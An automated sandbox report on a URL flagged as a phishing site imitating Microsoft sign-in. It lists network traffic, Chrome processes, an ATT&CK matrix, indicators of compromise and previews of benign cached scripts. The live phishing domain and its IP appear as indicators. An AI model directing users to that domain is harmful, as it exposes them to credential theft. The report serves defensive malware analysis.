      Source: chromecache_211.2.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
      Source: chromecache_182.2.drString found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
      Source: chromecache_226.2.drString found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.analytics-web-4.min.js
      Source: chromecache_121.2.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0
      Source: chromecache_226.2.drString found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0
      Source: chromecache_146.2.drString found in binary or memory: https://login.microsoftonline.com
      Source: chromecache_226.2.drString found in binary or memory: https://login.microsoftonline.com/forgetuser
      Source: chromecache_226.2.drString found in binary or memory: https://login.microsoftonline.com/savedusers?appid=
      Source: chromecache_226.2.drString found in binary or memory: https://login.microsoftonline.com/uxlogout?appid=
      Source: chromecache_146.2.drString found in binary or memory: https://login.windows-ppe.net
      Source: chromecache_226.2.drString found in binary or memory: https://schema.org/Rating
      Source: chromecache_226.2.drString found in binary or memory: https://setup.office.com/
      Source: chromecache_121.2.drString found in binary or memory: https://storage.live.com/users/0x
      Source: chromecache_226.2.drString found in binary or memory: https://www.skype.com/en/
      Source: chromecache_226.2.drString found in binary or memory: https://www.xbox.com/
      Source: chromecache_226.2.drString found in binary or memory: https://www.xbox.com/en-us/games/store/pc-game-pass/cfq7ttc0kgq8?icid=CNavAllPCGamePass
      Source: chromecache_226.2.drString found in binary or memory: https://www.xbox.com/en-us/games/store/xbox-game-pass-ultimate/cfq7ttc0khs0?icid=CNavAllXboxGamePass
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: classification engineClassification label: mal68.phis.win@21/462@24/5
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 --field-trial-handle=2184,i,6646781013531154719,7133456600072816568,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://jkqbjwq.maxiite.com"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 --field-trial-handle=2184,i,6646781013531154719,7133456600072816568,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire Infrastructure1
      Drive-by Compromise
      Windows Management Instrumentation1
      Browser Extensions
      1
      Process Injection
      1
      Process Injection
      OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
      Ingress Tool Transfer
      Traffic DuplicationData Destruction
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      https://jkqbjwq.maxiite.com100%Avira URL Cloudphishing
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://jkqbjwq.maxiite.com/100%Avira URL Cloudphishing
      https://developer.snapappointments.com/bootstrap-select)0%Avira URL Cloudsafe
      http://www.asp.net/ajaxlibrary/CDN.ashx.--0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      a.nel.cloudflare.com
      35.190.80.1
      truefalse
        high
        sni1gl.wpc.omegacdn.net
        152.199.21.175
        truefalse
          high
          www.google.com
          172.217.21.36
          truefalse
            high
            jkqbjwq.maxiite.com
            104.21.50.192
            truetrue
              unknown
              s-part-0035.t-0009.t-msedge.net
              13.107.246.63
              truefalse
                high
                js.monitor.azure.com
                unknown
                unknownfalse
                  high
                  identity.nel.measure.office.net
                  unknown
                  unknownfalse
                    high
                    aadcdn.msftauth.net
                    unknown
                    unknownfalse
                      high
                      consentdeliveryfd.azurefd.net
                      unknown
                      unknownfalse
                        high
                        login.microsoftonline.com
                        unknown
                        unknownfalse
                          high
                          aefd.nelreports.net
                          unknown
                          unknownfalse
                            high
                            mem.gfx.ms
                            unknown
                            unknownfalse
                              high
                              NameMaliciousAntivirus DetectionReputation
                              https://a.nel.cloudflare.com/report/v4?s=JaM1TPzdFYBViMywUD4wdPXx%2Fa95Uex4gZZPAeXFyFUHnQVmBW504NPeNMwjsFwmjuWUzjK3WdT4iwdHuFjINyZxJ6eXwtiJpe6a%2FblM4q9Ogb73TPBpaMt794bF9d95bWtCTbZmfalse
                                high
                                https://jkqbjwq.maxiite.com/true
                                • Avira URL Cloud: phishing
                                unknown
                                NameSourceMaliciousAntivirus DetectionReputation
                                https://www.xbox.com/en-us/games/store/xbox-game-pass-ultimate/cfq7ttc0khs0?icid=CNavAllXboxGamePasschromecache_226.2.drfalse
                                  high
                                  https://login.microsoftonline.com/savedusers?appid=chromecache_226.2.drfalse
                                    high
                                    https://www.skype.com/en/chromecache_226.2.drfalse
                                      high
                                      https://github.com/twbs/bootstrap/blob/main/LICENSE)chromecache_182.2.drfalse
                                        high
                                        https://www.xbox.com/en-us/games/store/pc-game-pass/cfq7ttc0kgq8?icid=CNavAllPCGamePasschromecache_226.2.drfalse
                                          high
                                          https://consentdeliveryfd.azurefd.net/mscc/lib/v2/wcp-consent.jschromecache_226.2.drfalse
                                            high
                                            https://storage.live.com/users/0xchromecache_121.2.drfalse
                                              high
                                              https://js.monitor.azure.com/scripts/c/ms.analytics-web-4.min.jschromecache_226.2.drfalse
                                                high
                                                https://login.microsoftonline.com/uxlogout?appid=chromecache_226.2.drfalse
                                                  high
                                                  https://getbootstrap.com/)chromecache_182.2.drfalse
                                                    high
                                                    https://login.windows-ppe.netchromecache_146.2.drfalse
                                                      high
                                                      https://aka.ms/yourcaliforniaprivacychoiceschromecache_226.2.drfalse
                                                        high
                                                        https://github.com/twbs/bootstrap/graphs/contributors)chromecache_182.2.drfalse
                                                          high
                                                          https://login.microsoftonline.comchromecache_146.2.drfalse
                                                            high
                                                            http://www.asp.net/ajaxlibrary/CDN.ashx.--chromecache_226.2.drfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://getbootstrap.com)chromecache_211.2.drfalse
                                                              high
                                                              https://setup.office.com/chromecache_226.2.drfalse
                                                                high
                                                                https://github.com/snapappointments/bootstrap-select/blob/master/LICENSE)chromecache_155.2.dr, chromecache_194.2.drfalse
                                                                  high
                                                                  https://github.com/twbs/bootstrap/blob/master/LICENSE)chromecache_211.2.drfalse
                                                                    high
                                                                    https://schema.org/Ratingchromecache_226.2.drfalse
                                                                      high
                                                                      https://www.xbox.com/chromecache_226.2.drfalse
                                                                        high
                                                                        http://schema.org/Organizationchromecache_226.2.drfalse
                                                                          high
                                                                          https://developer.snapappointments.com/bootstrap-select)chromecache_155.2.dr, chromecache_194.2.drfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://login.microsoftonline.com/forgetuserchromecache_226.2.drfalse
                                                                            high
                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs
                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            104.21.50.192
                                                                            jkqbjwq.maxiite.comUnited States
                                                                            13335CLOUDFLARENETUStrue
                                                                            239.255.255.250
                                                                            unknownReserved
                                                                            unknownunknownfalse
                                                                            172.217.21.36
                                                                            www.google.comUnited States
                                                                            15169GOOGLEUSfalse
                                                                            35.190.80.1
                                                                            a.nel.cloudflare.comUnited States
                                                                            15169GOOGLEUSfalse
                                                                            IP
                                                                            192.168.2.4
                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                            Analysis ID:1580031
                                                                            Start date and time:2024-12-23 18:47:04 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 3m 18s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:browseurl.jbs
                                                                            Sample URL:https://jkqbjwq.maxiite.com
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Run name:Potential for more IOCs and behavior
                                                                            Number of analysed new started processes analysed:8
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:0
                                                                            Technologies:
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Detection:MAL
                                                                            Classification:mal68.phis.win@21/462@24/5
                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                            • Excluded IPs from analysis (whitelisted): 172.217.19.227, 172.217.19.238, 64.233.161.84, 142.250.181.142, 2.16.158.83, 2.16.158.88, 2.16.158.59, 2.16.158.91, 2.16.158.171, 2.16.158.58, 2.16.158.81, 2.16.158.96, 2.16.158.73, 2.16.158.33, 2.16.158.176, 2.16.158.32, 2.16.158.41, 2.16.158.187, 2.16.158.179, 2.16.158.27, 2.16.158.43, 2.16.158.186, 2.16.158.192, 2.16.158.184, 2.16.158.169, 2.16.158.170, 199.232.210.172, 192.229.221.95, 20.190.147.5, 20.190.147.0, 20.190.147.3, 20.190.177.85, 20.190.147.11, 20.190.177.82, 20.190.177.23, 20.190.177.146, 172.217.17.35, 20.190.147.8, 20.190.177.149, 20.190.147.7, 20.190.177.84, 2.19.198.33, 23.32.239.40, 23.32.238.209, 23.32.238.168, 184.30.21.171, 2.16.1.179, 2.16.1.171, 23.218.208.109, 4.175.87.197, 13.107.246.63
                                                                            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, e13678.dscb.akamaiedge.net, clientservices.googleapis.com, p-static.bing.trafficmanager.net, ak.privatelink.msidentity.com, www.microsoft.com-c-3.edgekey.net, clients2.google.com, e86303.dscx.akamaiedge.net, filestore.community.support.microsoft.com, ocsp.digicert.com, star-azurefd-prod.trafficmanager.net, login.live.com, update.googleapis.com, csp.microsoft.com, www.bing.com, san-ion.secure4.scene7.com.edgekey.net, fs.microsoft.com, aadcdnoriginwus2.azureedge.net, www.tm.v4.a.prd.aadg.akadns.net, aadcdn.msauth.net, www-www.bing.com.trafficmanager.net, edgedl.me.gvt1.com, nel.measure.office.net.edgesuite.net, amcdnmsftuswe.azureedge.net, aadcdnoriginwus2.afd.azureedge.net, clients.l.google.com, www.tm.lg.prod.aadmsa.trafficmanager.net, aefd.nelreports.net.akamaized.net, a1894.dscb.akamai.net, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net, answers-afd.microsoft.com, redirector.gvt1.com, www.bing.com.edgekey.net, th.bing.com, r
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • VT rate limit hit for: https://jkqbjwq.maxiite.com
                                                                            No simulations
                                                                            No context
                                                                            No context
                                                                            No context
                                                                            No context
                                                                            No context
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (2169), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):2169
                                                                            Entropy (8bit):5.302641155413102
                                                                            Encrypted:false
                                                                            SSDEEP:48:1cLdSF8cWOr7dDv8NQtaPVcbnAhaNaswAUbDdDLpmhMi7WViUCS7SDDRb:1cZSDBdDv8saMPgHfLEM8Xb3Rb
                                                                            MD5:61533293909D97252C70E82BD574BA68
                                                                            SHA1:7408DD25C19AE7BAF954074576A2F73FBB174310
                                                                            SHA-256:99EC639C3DDC51E7882FAB9C08EC5A905B49F4B04D1C47B6DF40F3924E81CD8E
                                                                            SHA-512:BF8F8879D1CABD6B8B9C6CAF9FC0A6F68362FC62328112636D78A15A4C08B35EA52E1DD8048715F2BD0E945BB0D2D8D7655E68A065942E89316E303BB536BB41
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:(function(){function l(n){return parseFloat((_w.getComputedStyle?_w.getComputedStyle(n):n.currentStyle).width)}var a="results_container",t="sb_shr sw_conv",v="sb_shr sw_conva",y={"ans2 ans_n2 ans_msnO":1},i={"sb_h3 cttl":1},r="sb_ltw",p="sb_ans",n=[],u=!!_G.SPSA,f=u?{ansC:1,results:1,sa_bop:1}:{results:1},e=!1,o=20,w=-28,b=function(){if(typeof _d.querySelector!="undefined"){var n=".sb_shr{left:"+w+o+"px;width:0;float:right;margin-left:5px}.sb_ltw{margin:0 0 0 -55px;clear:both;float:left;display:block;width:50px}.pi_tc{float:right;}";sj_ic(n);sj_evt.bind("sp.enter_conv",g,1);sj_evt.bind("sp.leave_conv",h,1);sj_evt.bind("sp.submit_conv",h)}},k=function(){var u,o,i,n,s,r,t,h;if(!e){for(u=_ge(a),o=u?u.childNodes:[],i=0;i<o.length;i++)if(n=o[i],n.id&&f[n.id]||n.className&&f[n.className])for(s=n?n.childNodes:[],r=0;r<s.length;r++)for(t=s[r].firstChild;t;)h=t.nodeType,h!==3&&h!==8&&d(t),t=t.nextSibling;e=!0}},d=function(n){var i=n.className,t;if(i&&i.indexOf(p)>-1){if(u)for(t=n.firstChild.fir
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):44
                                                                            Entropy (8bit):4.299896391167891
                                                                            Encrypted:false
                                                                            SSDEEP:3:Rx6sLWr5iGNk0RHYWRaY:RpKXxhjh
                                                                            MD5:71C2B5240CDB4B1001CED162819ECA33
                                                                            SHA1:231B0AB741B41D85AA061E56AD51B06A610C452F
                                                                            SHA-256:A220299F29BE127116C8466D6306676F10E9E4200AAED3646547F9AA53501226
                                                                            SHA-512:C2E2BCC607A802AD740707620C84D7240A7639EFD15CA01A0012FFEF61ABA5A723B1AEE0B93B426D6F0DB7B975421032F99EEA2F823B88E99A2D40DB4C50BAC8
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/IxsKt0G0HYWqBh5WrVGwamEMRS8.js
                                                                            Preview:new wpc_Inst(_w.sched,_ge("b_context"),"TP")
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (3000), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):3000
                                                                            Entropy (8bit):5.127130139745141
                                                                            Encrypted:false
                                                                            SSDEEP:24:EnUduqizB+eVc9GB7B8SxiBlKX1PWLKX1PWvXtOGKxF9/soVqPq3CnN8Vi/h6Ua3:gVqE+9GBtjZMm0wjENMiph82RXrY
                                                                            MD5:3D30D31BB574351F0F7218085E443487
                                                                            SHA1:DD10CEB04D28E6FC22D89DD1098B3F847E2F9C18
                                                                            SHA-256:BD676D9118A01F1CD3694C2587A413890A10CF33E8FF2577E24FEFEBDA843AE9
                                                                            SHA-512:8BB4C65D6730679D2AEE49EAE1BE1C4E4720CAB44B5833BF06E2C23A2C3F4B4B5DC985807489116B7135B64C39C2BC04C7E9C7176C0A619B46CCAD784B8B280B
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/3RDOsE0o5vwi2J3RCYs_hH4vnBg.css
                                                                            Preview:.rwds_svg{vertical-align:top;display:inline-block}.rwds_svg.serp{margin:8px 0 0 8px}.rhlined,.rhfill{vertical-align:top;width:32px;height:32px}#id_rh,#id_rbh{position:relative}.id_button toolTip:after,#id_rh:after{white-space:pre-line !important;width:200px}.rhcoinflip{vertical-align:top;width:60px;height:60px;position:absolute;right:-6px;top:-6px}#idCont .rhcoinflip{position:absolute;right:-5px;top:-9px}#rh_meter{vertical-align:top;width:40px;height:40px;margin-left:-36px;margin-top:-4px}.rh_reedm .rhlined,.rhfill,.rh_reedm .meter,.rd_hide{display:none}.rhlined,.rh_reedm .rhfill,#rh_meter{display:inline-block}.noBg .rhlined.hp .meter,.noBg .rhfill.hp .meter,.rhlined.serp .meter,.rhfill.serp .meter{stroke:rgba(177,177,177,.4)}.rhlined.serp .medal{fill:#919191}.noBg .rh_reedm .rhfill.hp .medal,.rh_reedm .rhfill.serp .medal{fill:#00809d}#rh_animcrcl{fill:none;stroke:transparent;stroke-width:0}#rh_animcrcl.anim{stroke-width:2}.rh_scale .rhfill,.rh_scale #rh_meter{animation:scaling .4s cub
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (385), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):385
                                                                            Entropy (8bit):4.936376566808913
                                                                            Encrypted:false
                                                                            SSDEEP:12:plfn6AV2wCBW0eLeFZfg9DW3si0lov0Ur:pl6WV0e+ZfgU3ClosUr
                                                                            MD5:A1FA00AE2F6AEF9F21F45585BA052882
                                                                            SHA1:3A9C42D5B48FB6A045B9A78A20B571BE25FB78FB
                                                                            SHA-256:621B48AD818F5CB1DE51B58BEC5193E0243EFFB8E805D45BA960F688A49C7748
                                                                            SHA-512:99924D889724941E71A0456097DC59B4C73BD6311C81AF28854FA3513F42EF819CD3C0303B0E982EE40E5B82CF1D24F7835C637DE536F2A92F0F34E0AEFA3672
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:_w.keyMap={Content:"b_content",SearchForm:"sb_form",SBoxId:"sb_form_q",Notification:"b_notificationContainer",Identity:"id_h",Prefix:"b_",RmsDefer:"aRmsDefer",RmsKeys:["rms:answers:Shared:BingCore.Bundle","rms:answers:AjaxSerp:Ajax.Bundle","rms:answers:BoxModel:Framework"],AutoSug:"sa_as",FeaturePersist:1,LangSwitch:"langChange",ASContainer:"sw_as",Result:"b_results",HBop:"sb_hbop"}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):30
                                                                            Entropy (8bit):4.2817276788697365
                                                                            Encrypted:false
                                                                            SSDEEP:3:0+xdTv9a:fxdT4
                                                                            MD5:53A64DFCB494ED16A6E2C29149E095CD
                                                                            SHA1:3F89D59BD710EFC15AC43D153BCA7302E172A5B9
                                                                            SHA-256:FAAFAD6C77EE74E48879AFF39C97D4DC47744BFCBBBE0A72F20449875CC4B3D3
                                                                            SHA-512:1C6AFD0B95716B9D87A3CB1B3FEDB7EEA347059234054A61FB699901A2FD1AE463AB352608D422C790EA26FBC6B8F7A7AFF7B81D0D165E08B32F56A49AB86697
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/P4nVm9cQ78FaxD0VO8pzAuFypbk.css
                                                                            Preview:#b_results .tilk{display:flex}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (905), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):905
                                                                            Entropy (8bit):5.273654524180373
                                                                            Encrypted:false
                                                                            SSDEEP:24:rVnoyfEzPleiOvpKP5n8kmyNSiRf1wVJ2:rVnoyixOQ5n8krNSiN1wr2
                                                                            MD5:78BA2BAC4274EBD7D060D6F02AE001D0
                                                                            SHA1:1A47860DC9AEDFE69DDC6E14A6C4BFC583C24D4E
                                                                            SHA-256:B908D312F517D62B6ECF48BD2FCDD83918E098485FE9BE42139AEC090775FAC6
                                                                            SHA-512:00DCD24F8D096EE625FEAF2E8376777D94535488871716DD6682EDE69C60231A3DDE168C76336A17A3BD6C4327EC138E33E1C9189DFE7427C5D4EE97B2374CE9
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var __spreadArray=this&&this.__spreadArray||function(n,t,i){if(i||arguments.length===2)for(var r=0,f=t.length,u;r<f;r++)!u&&r in t||(u||(u=Array.prototype.slice.call(t,0,r)),u[r]=t[r]);return n.concat(u||Array.prototype.slice.call(t))},LightLogger;(function(n){function i(n,t,i,r,u){var e,f;if(u=u||{},u.FID="ModernRewardsFlyout",u.EventName=i,_w&&_w.Log2&&Log2.LogEvent&&_G.XLS)Log2.LogEvent("ClientInst",u,t),Log2.ForceFlush&&r&&Log2.ForceFlush(!0);else if(_w&&_w.Log&&Log.Log){if(e=["Fallback","1"],u&&u.hasOwnProperty)for(f in u)u.hasOwnProperty(f)&&(e.push(f?f.toString():""),e.push(u[f]?u[f].toString():""));Log.Log.apply(Log,__spreadArray([t,"ModernRewardsFlyout",i,r],e,!1))}}var t;(function(n){n.Click="Click";n.Init="Init";n.Load="Load";n.Success="Success";n.Error="Error"})(t=n.InstrumentationEventType||(n.InstrumentationEventType={}));n.logInstrumentationV2=i})(LightLogger||(LightLogger={}))
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (674), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):674
                                                                            Entropy (8bit):5.210197710226456
                                                                            Encrypted:false
                                                                            SSDEEP:12:NYRUeSpDeuB0UzQSp/CSpsDZmDdFly/r7bOOy/k3z7oOX8j1L1z8MmTfMM:iRbpuB5zQuCnsa7bOOlj7oOX4l1z8Mmx
                                                                            MD5:5A1A81312BF61E94FC97DB3A171C2240
                                                                            SHA1:5B16C57ADE22CC6948296B564D0E9B3FA7C81A49
                                                                            SHA-256:3E371F38691430D58C417A3CCB0C9FB4F9F7ED8E92321C42D2CF6B680FB349F9
                                                                            SHA-512:75BD3BAC62BDD1105E460BD89A1372BC3F0BF47DA4C7B49E758CB175D9A52BD77090DED7AF2CE0E6E804E292495FFA44D004E1C6862F39EACC44F1FD488AF5E7
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var LogAccessibilityEvents;(function(){function t(){var t=1;t=navigator&&navigator.userAgent.match(/Edge/)&&_w.screen?screen.deviceXDPI/screen.systemXDPI:navigator&&(navigator.userAgent.match(/Firefox/ig)||navigator.userAgent.match(/Trident/))?_w.devicePixelRatio:_w.outerWidth/_w.innerWidth;t>=4&&_w.devicePixelRatio>=4?(n=!0,Log.Log("Info","Accessibility","acczoommob"),Log.LogFilterFlare&&Log.LogFilterFlare(["acczoommob"])):n&&(Log.Log("Info","Accessibility","acczoompc"),Log.LogFilterFlare&&Log.LogFilterFlare(["acczoompc"]),n=!1)}var n=!1;typeof Log!="undefined"&&Log.Log&&(t(),sj_be(_w,"resize",function(){t()}))})(LogAccessibilityEvents||(LogAccessibilityEvents={}))
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:Unicode text, UTF-8 text, with very long lines (1587), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1589
                                                                            Entropy (8bit):5.24528911504239
                                                                            Encrypted:false
                                                                            SSDEEP:48:KyskFELbJnSYVtXpQyL93NzpGaQJWA6vrIhf7:KybibJnSE5aU93HGaQJWAiIh
                                                                            MD5:CB027BA6EB6DD3F033C02183B9423995
                                                                            SHA1:368E7121931587D29D988E1B8CB0FDA785E5D18B
                                                                            SHA-256:04A007926A68BB33E36202EB27F53882AF7FD009C1EC3AD7177FBA380A5FB96F
                                                                            SHA-512:6A575205C83B1FC3BFAC164828FBDB3A25EAD355A6071B7D443C0F8AB5796FE2601C48946C2E4C9915E08AD14106B4A01D2FCD534D50EA51C4BC88879D8BEC8D
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var wln=wln||"",Identity;(function(n){function i(n){n.style.display="none";n.setAttribute("aria-hidden","true")}function r(n){n.style.display="inline-block";n.setAttribute("aria-hidden","false")}var u,t;n&&n.sglid&&n.setLoginPreference&&sj_be&&sj_cook&&sj_evt&&_d&&typeof _d.querySelectorAll!="undefined"&&(u=function(n){var i=n.getAttribute("data-a"),t=n.getAttribute("data-p");i==="false"&&t!=null&&sj_be(n,"click",function(){sj_cook.set("SRCHUSR","POEX",t,!0,"/")})},sj_evt.bind("identityHeaderShown",function(){var n=!1;sj_be(_ge("id_l"),"click",function(){var i,t;if(!n){for(i=_d.querySelectorAll(".b_imi"),t=0;t<i.length;t++)u(i[t]);n=!0}})},!0));sj_evt&&n&&(t=function(t){var h;if(t==null||t.idp!=="orgid"||(h=n.wlProfile(),h==null||h.name==null||t.name!=null)){var e=_ge("id_n"),u=_ge("id_p"),o=_ge("id_s"),s=_ge("id_a"),f=t?t.displayName:wln,c=t?t.img:null,l=t?t.idp:null,a=t?t.cid:null;e&&s&&(a||f)?(u&&c&&(u.title=f,u.src=c,r(u)),f.length>10&&(f=f.substring(0,10).replace(/\s+$/,"")+".")
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (2683), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):2683
                                                                            Entropy (8bit):5.285209446790883
                                                                            Encrypted:false
                                                                            SSDEEP:48:5sksi0wg1S0h195DlYt/5ZS/wAtKciZIgDa4V8ahff/Z/92zBDZDNJC0x0M:yk1g1zbed3SBkdZ9ZGVFNJCRM
                                                                            MD5:FB797698EF041DD693AEE90FB9C13C7E
                                                                            SHA1:394194F8DD058927314D41E065961B476084F724
                                                                            SHA-256:795E9290718EB62A1FB00646DC738F6A6B715B1171DD54A3D2DEFA013A74F3DA
                                                                            SHA-512:E03C4AB727567BE95B349B971E29CFFB3890CFB1A1DDF997B34B9D69154294A00A5112F4FFCA4DF4E26BBF96AFA75E5943E965EDC8F8E21035ED2EF30B7688D8
                                                                            Malicious:false
                                                                            Reputation:low
